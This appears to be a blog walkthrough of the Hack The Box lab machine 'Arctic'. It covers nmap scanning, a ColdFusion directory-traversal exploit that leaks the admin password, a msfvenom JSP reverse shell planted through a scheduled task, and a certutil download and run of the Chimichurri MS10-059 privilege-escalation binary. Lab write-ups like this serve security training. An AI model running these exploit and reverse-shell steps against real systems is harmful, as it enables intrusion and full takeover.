Skip to content

HTB – Arctic

nmap -sVC                                                                                                    
Starting Nmap 7.91 ( ) at 2021-04-16 07:18 CEST
Nmap scan report for
Host is up (0.054s latency).
Not shown: 997 filtered ports
135/tcp open msrpc Microsoft Windows RPC
8500/tcp open fmtp?
49154/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

after trying to enumerate with RPCCLIENT i got nothing helpful and tested the Port8500 no exploits are available for fmtp

ok, now we have found something hope it’s vulnerable. There are multiple Vulnerabilitys!

$searchsploit -m 14641
  Exploit: Adobe ColdFusion - Directory Traversal
     Path: /usr/share/exploitdb/exploits/multiple/remote/
File Type: Python script, ASCII text executable, with CRLF line terminators

Copied to: /home/chris/

read the exploit // execute the //get the password

#python2 8500 ../../../../../../../lib/  
trying /CFIDE/wizards/common/_logintowizard.cfm  
title from server in /CFIDE/wizards/common/_logintowizard.cfm:  
#Wed Mar 22 20:53:51 EET 2017  
rdspassword=0IA/F[[E>[$_6& \\Q>[K\=XP  \n  

i think the way to the password is comprehensible , now we can login on the coldfusion admin panel. Scheduled Tasks are your best friend!

create java payload // start webserver on you kali/parrot wait for Code 200 that and you are lucky 😀 The hardest Part was to find out which location you can save the shell.jsp

C:\ColdFusion8\wwwroot\CFIDE\shell.jsp // location to save output
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT=5555 -f raw > shell.jsp

after uploading you can start and get surprised with a reverse shell 🙂

now to the Privilege Escalation after i get systeminfo and run the exploit-suggester

#python2 --database 2021-03-19-mssb.xls --systeminfo sysinfo.txt
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (utf-8)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits
[*] there are now 197 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2008 R2 64-bit'
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*] -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*] -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[*] done

after multiple fails, i tryed the MS10-059 and found good binarys at I don’t know why chimichurri but you can find that name on the website.

therefore same game again //download // start webserver // download //upload to target

certutil.exe -urlcache -split -f "" Chimichurri.exe
C:\ColdFusion8\runtime\bin>Chimichurri.exe 6666

Back To Top